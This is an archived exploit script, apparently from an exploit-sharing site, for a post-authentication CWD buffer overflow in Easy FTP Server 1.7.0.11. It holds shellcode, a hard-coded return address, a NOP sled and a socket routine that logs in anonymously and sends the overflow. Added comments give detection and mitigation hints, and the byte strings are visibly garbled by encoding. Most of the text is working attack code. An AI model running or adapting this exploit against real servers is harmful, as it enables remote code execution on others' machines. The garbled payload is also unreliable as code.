Easy FTP Server v1.7.0.11 CWD Command Remote Buffer Overflow Exploit
Easy FTP Server v1.7.0.11 CWD Command Remote Buffer Overflow Exploit (Post Auth)
================================================================================
# Exploit Title: Easy FTP Server v1.7.0.11 CWD Command Remote Buffer Overflow Exploit (Post Auth)
# Date: 2010-07-18
# Author: fdisk
# Software Link:
# Version: 1.7.0.11
# Tested on: Windows XP SP3 en
# CVE:
import socket
import sys
# Layout of the oversized CWD argument: the server's CWD handler copies the
# path into a fixed buffer; `buffersize` is the number of bytes the author
# reports it takes to reach the saved return address on the tested build
# (Windows XP SP3 en, v1.7.0.11 per the header). Anything past that point
# overwrites control data.
buffersize = 268
# windows/exec – 227 bytes x86/shikata_ga_nai EXITFUNC=process, CMD=calc.exe
# NOTE(review): the byte-string literals below (and the eip/nopsled values)
# are garbled by the page's encoding (note the `×` and curly-quote characters
# interleaved with the escapes); they are reproduced verbatim, not repaired.
shellcode = ("xb8xf1×18xc7×71xd9xc7×29xc9xb1×33xd9×74x24xf4"
"x5bx31×43x12×83xebxfcx03xb2×16x25×84xc8xcfx20"
"x67×30x10×53xe1xd5×21x41×95x9ex10×55xddxf2×98"
"x1exb3xe6×2bx52×1cx09×9bxd9×7ax24×1cxecx42xea"
"xdex6ex3fxf0×32x51×7ex3bx47×90x47×21xa8xc0×10"
"x2ex1bxf5×15x72xa0xf4xf9xf9×98x8ex7cx3dx6cx25"
"x7ex6dxddx32xc8×95x55×1cxe9xa4xbax7exd5xefxb7"
"xb5xadxeex11×84x4exc1×5dx4bx71xeex53×95xb5xc8"
"x8bxe0xcdx2bx31xf3×15x56xedx76×88xf0×66x20×68"
"x01xaaxb7xfbx0dx07xb3xa4×11x96×10xdfx2dx13×97"
"x30xa4×67xbcx94xedx3cxddx8dx4bx92xe2xcex33×4b"
"x47×84xd1×98xf1xc7xbfx5fx73×72x86×60x8bx7dxa8"
"x08xbaxf6×27x4ex43xddx0cxa0×09x7cx24×29xd4×14"
"x75×34xe7xc2xb9×41x64xe7×41xb6×74x82×44xf2×32"
"x7ex34×6bxd7×80xebx8cxf2xe2×6ax1fx9excax09xa7"
"x05×13")
# Return-address overwrite. The author's note says this is a CALL EDI gadget
# in user32.dll: a fixed module address, which is why the exploit is tied to
# the one tested OS build — address randomisation of system modules would
# break it. That dependence on a hard-coded address is the usual mitigation
# lever besides patching the server.
eip = "x91xC8×41x7E" # CALL EDI – user32.dll
# Short NOP sled in front of the shellcode; the run of 0x90 bytes followed by
# a long, high-entropy CWD argument is the observable signature of this
# attack on the wire.
nopsled = "x90" * 16
# Filler that pads sled + shellcode out to exactly `buffersize` bytes so the
# 4-byte `eip` value lands on the saved return address.
payload = "x90" * (buffersize-(len(nopsled)+len(shellcode)))
def ExploitEasyFTP(target):
    """Proof of concept for the post-authentication CWD overflow.

    Connects to the FTP service on port 21 of `target`, logs in with the
    anonymous account, then issues a single CWD whose argument is
    `buffersize` + 4 bytes (sled, shellcode, filler, return address).
    The exploit is post-auth only: the anonymous login must succeed before
    the CWD handler is reachable, so disabling anonymous access removes this
    code path for unauthenticated clients.

    Args:
        target: hostname or IP address of the FTP server.

    Returns:
        None; the function does not inspect the server's replies.

    Detection: an FTP session whose CWD argument is several hundred bytes and
    begins with a run of 0x90 bytes. A server-side fix is to bound the CWD
    path length before copying it into a fixed buffer.

    NOTE(review): the string literals here are garbled by the page's
    encoding (curly quotes, lost escape characters) and are kept verbatim.
    Indentation of the body was also lost on the page and is restored here.
    """
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    # `connect` is never read; socket.connect() returns None anyway.
    connect = s.connect((target, 21))
    s.recv(1024)   # banner
    s.send(‘User anonymousrn’)
    s.recv(1024)   # 331 reply to USER
    s.send(‘PASS anonymousrn’)
    # No recv() after PASS: the login reply and the CWD are not sequenced,
    # so the overflow request is sent regardless of whether login succeeded.
    s.send(‘CWD ‘+nopsled+shellcode+payload+eip+’rn’)
    s.recv(1024)
    s.send(‘QUIT ftprn’)
    s.close()
# Script entry: the single positional argument is the target host. There is
# no argument count check, so running without one raises IndexError rather
# than printing usage.
target = sys.argv[1]
ExploitEasyFTP(target)
# Inj3ct0r.com [2010-07-18]
Source: http://inj3ct0r.com/exploits/13391
